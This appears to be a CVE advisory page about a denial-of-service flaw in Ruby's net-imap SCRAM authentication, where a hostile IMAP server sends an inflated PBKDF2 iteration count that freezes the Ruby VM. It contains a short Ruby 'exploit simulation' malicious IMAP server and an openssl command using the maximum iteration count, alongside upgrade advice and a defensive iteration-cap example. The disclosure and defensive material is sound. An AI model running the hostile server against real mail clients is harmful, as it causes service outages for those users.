How the CVE Works
The vulnerability lies in net-imap's SCRAM authentication mechanism. When a client attempts to authenticate with SCRAM-SHA-1 or SCRAM-SHA-256, a hostile IMAP server can inject an arbitrarily large PBKDF2 iteration count into the server-first-message. The client then executes an expensive OpenSSL::KDF.pbkdf2_hmac call, which is a blocking C extension. Because this function holds Ruby's Global VM Lock (GVL) throughout its computation, the entire Ruby Virtual Machine (VM) is frozen for the duration of the call. OpenSSL caps the iteration count at a 32-bit signed integer (2³¹-1). Depending on hardware and OpenSSL version, processing this maximum iteration count can block all Ruby threads in the process for over seven minutes. The Timeout module cannot be used to guard against this because the function is a native C extension that does not release the GVL. This attack vector is explicitly noted in RFC 7804's "Security Considerations". An attacker only needs to be able to send a crafted SCRAM server-first message; no authentication or prior access is required.
DailyCVE Form
Platform: Ruby net-imap
Version: 0.4.0-0.4.23, 0.5.0-0.5.13, 0.6.0-0.6.3
Vulnerability: DoS via high iteration count
Severity: Moderate
Date: 2026-04-24
Prediction: Patch expected 2026-05-01
What Undercode Say
Analytics Commands
Check net-imap version:

```shell
gem list net-imap
```

Monitor Ruby VM load during SCRAM auth:

```shell
while true; do ps -o %cpu,time -p $(pgrep -f "ruby.your_script.rb"); sleep 1; done
```

Simulate high iteration count (example using `openssl` CLI):

```shell
openssl kdf -keylen 32 -kdfopt pass:test -kdfopt salt:saltsalt -kdfopt iter:2147483647 PBKDF2
```
Exploit Simulation (Ruby)
Malicious IMAP server snippet - sends an inflated iteration count

```ruby
require 'socket'

server = TCPServer.new('localhost', 1143)
loop do
  client = server.accept
  client.puts "* OK IMAP4 ready"
  client.gets # consume client's CAPABILITY command
  client.puts "* CAPABILITY IMAP4rev1 AUTH=SCRAM-SHA-256"
  client.puts "1 OK done"
  client.gets # consume AUTHENTICATE command
  # Send SCRAM server-first message with huge iteration count
  client.puts "+ r=clientNonce,s=somesalt,i=2147483647"
  # Client will now block for minutes
  client.close
end
```
Protection from this CVE
- Upgrade net-imap to a patched version (0.4.24, 0.5.14, 0.6.4 or later).
- Specify a safe `max_iterations` in the authentication call:
  `imap.authenticate("SCRAM-SHA-256", username, password, max_iterations: 100_000)`

  The default `max_iterations` is 2³¹-1, which is unsafe. Choose a value that balances security and performance (e.g., 100,000-1,000,000). Failure to set a low threshold leaves the client vulnerable to the attack.
- Avoid SCRAM mechanisms when connecting to untrusted servers, or use implicit TLS connections (port 993) instead of STARTTLS.
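The defensive check behind the `max_iterations` setting, written out as an added example (not net-imap's own code): parse the SCRAM server-first-message and bound the server-supplied `i=` count before `OpenSSL::KDF.pbkdf2_hmac` ever runs. `DEFAULT_MAX_ITERATIONS`, `ScramServerError` and the helper names are assumptions of this example.

```ruby
require "openssl"

# Assumed cap for this example; net-imap's patched releases expose a
# max_iterations option for the same purpose. Pick a value legitimate servers fit under.
DEFAULT_MAX_ITERATIONS = 100_000

class ScramServerError < StandardError; end

# Parse an RFC 5802 server-first-message "r=<nonce>,s=<base64 salt>,i=<count>".
# Every field is server-controlled, so each one is validated before use.
def parse_server_first(msg)
  attrs = {}
  msg.split(",").each do |field|
    key, value = field.split("=", 2)
    raise ScramServerError, "malformed attribute #{field.inspect}" if value.nil?
    attrs[key] = value
  end
  %w[r s i].each { |k| raise ScramServerError, "missing #{k}= attribute" unless attrs.key?(k) }
  # Only a plain positive decimal is accepted for i= (no sign, no leading zeros).
  raise ScramServerError, "bad iteration count #{attrs['i'].inspect}" unless attrs["i"].match?(/\A[1-9][0-9]*\z/)
  # unpack1("m0") is strict base64 and raises ArgumentError on junk.
  { nonce: attrs["r"], salt: attrs["s"].unpack1("m0"), iterations: Integer(attrs["i"], 10) }
rescue ArgumentError => e
  raise ScramServerError, "salt is not valid base64: #{e.message}"
end

# Derive SaltedPassword = PBKDF2-HMAC(password, salt, i) only after bounding i.
# The cap is enforced *before* the native call starts, because once pbkdf2_hmac is
# running it holds the GVL and Timeout cannot interrupt it.
def derive_salted_password(password, server_first, max_iterations: DEFAULT_MAX_ITERATIONS, hash: "SHA256")
  parsed = parse_server_first(server_first)
  if parsed[:iterations] > max_iterations
    raise ScramServerError,
          "server asked for #{parsed[:iterations]} PBKDF2 iterations, cap is #{max_iterations}"
  end
  OpenSSL::KDF.pbkdf2_hmac(password,
                           salt: parsed[:salt],
                           iterations: parsed[:iterations],
                           length: OpenSSL::Digest.new(hash).digest_length,
                           hash: hash)
end

if $PROGRAM_NAME == __FILE__
  # Constructed messages: the hostile one mirrors the page's 2^31-1 count.
  begin
    derive_salted_password("pencil", "r=clientNonce,s=somesalt,i=2147483647")
  rescue ScramServerError => e
    puts "rejected: #{e.message}"
  end
  puts derive_salted_password("pencil", "r=clientNonce,s=somesalt,i=4096").unpack1("H*")
end
```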
Impact
- Complete Ruby VM freeze - all threads (including the main thread) are blocked for the duration of the PBKDF2 computation.
- Extended downtime - a single authentication attempt can lock the process for up to several minutes (over 7 minutes observed on some hardware/OpenSSL versions).
- No timeout protection - because the vulnerable function is a C extension that holds the GVL, Ruby's `Timeout` module cannot interrupt it.
- Ease of exploitation - an attacker only needs to send a malicious SCRAM server-first message; no pre-authentication or special privileges are required.
- Wide attack surface - any application that uses `net-imap` with SCRAM authentication (e.g., email clients, backup tools) is at risk when connecting to untrusted or compromised IMAP servers.
Sources:
Reported By: github.com